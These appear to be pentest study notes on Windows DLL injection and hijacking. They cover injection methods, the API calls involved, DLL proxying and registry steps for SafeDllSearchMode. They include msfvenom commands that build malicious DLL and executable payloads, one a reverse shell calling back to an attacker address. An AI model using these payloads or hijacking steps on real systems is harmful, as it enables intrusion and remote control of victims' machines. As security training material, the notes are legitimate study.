dll-injection

DLL injection is a method that involves inserting a piece of code, structured as Dynamic Link Library, into a running process. There are several methods of doing this: HTB module - https://academy.hackthebox.com/module/67/section/2501

• LoadLibrary

• Manual mapping

• Reflective DLL injection

DLL Hijacking is an exploitation technique where an attacker capitalizes on the Windows DLL loading process. These DLLs can be loaded during runtime, creating a hijacking opportunity if an application doesn't specify the full path to a required DLL, hence rendering it susceptible to such attacks.

• Press Windows key + R

• Type regedit and press enter

• Navigate to HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager.

• Look for SafeDllSearchMode value, if it doesn't exist, right click on the blank space of the folder or right-click the session manger folder. Select "new" and then DWORD (32-bit) value. Name this new vale as SafeDllSearchMode.

• Double-click SafeDllSearchMode. In the value data field, enter 1 to enable and 0 to disable safe DLL search mode.

Generate dll payload

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll

					OR

msfvenom -p windows/exec CMD="C:\Windows\System32\calc.exe" -f dll -o malicious.dll

					OR

msfvenom -p cmd/windows/powershell/exec CMD="<Your_Command>" -f exe > payload.exe

---

---

---

Windows API Calls (DLL Injection)

# Open a handle to the target process
OpenProcess

# Allocate memory in the target process
VirtualAllocEx

# Write data into the allocated memory
WriteProcessMemory  

# Retrieve the address of an exported function from a DLL
GetProcAddress

# Create a thread in the target process
CreateRemoteThread

# Load a DLL into the process
LoadLibrary

# Free the loaded DLL
FreeLibrary

Registry (DLL Hijacking)

Regedit

Process Monitoring (DLL Hijacking)

Process Monitor (procmon)

---

---

---

Key Concepts:

• DLL Injection: - Inserting a DLL into a running process to execute arbitrary code. - Used for legitimate purposes (hot patching) and malicious activities.

• LoadLibrary: - Windows API function for loading DLLs. - Can be used for remote DLL injection.

• Manual Mapping: - Directly mapping DLL sections into a process's memory. - Bypasses LoadLibrary monitoring.

• Reflective DLL Injection: - DLL loads itself from memory, minimizing host interaction.

• DLL Hijacking: - Exploiting the Windows DLL search order to load a malicious DLL. - Relies on missing or weakly specified DLL paths.

• DLL Proxying: - Creating a proxy DLL that loads the original DLL, modifies its functions, and returns the modified result.

Approach, Commands, Tools, and Techniques:

1. LoadLibrary Injection: - OpenProcess, VirtualAllocEx, WriteProcessMemory, GetProcAddress, CreateRemoteThread (Windows API calls).

2. Manual Mapping: - Load DLL as raw data, map sections, inject shellcode.

3. Reflective DLL Injection: - ReflectiveLoader function within the DLL. - Parses PE headers, resolves imports, relocates DLL.

4. DLL Hijacking: - Process Explorer, PE Explorer (DLL analysis). - Process Monitor (procmon) to monitor file access. - Create malicious DLLs. - Regedit to modify the SafeDllSearchMode.

5. DLL Proxying: - Create a proxy DLL that loads the original DLL. - Modify the desired function within the proxy DLL. - Replace the original DLL with the proxy DLL

Commands:

• Windows API calls: OpenProcess, VirtualAllocEx, WriteProcessMemory, GetProcAddress, CreateRemoteThread, LoadLibrary, FreeLibrary.

• Regedit.

• Process Monitor(procmon). Tools:

• Process Explorer.

• PE Explorer.

• Compilers (C).

• Debuggers/Disassemblers. Techniques:

• Creating malicious DLLs.

• Modifying DLL functions.

• Monitoring process activity.

• Reverse engineering.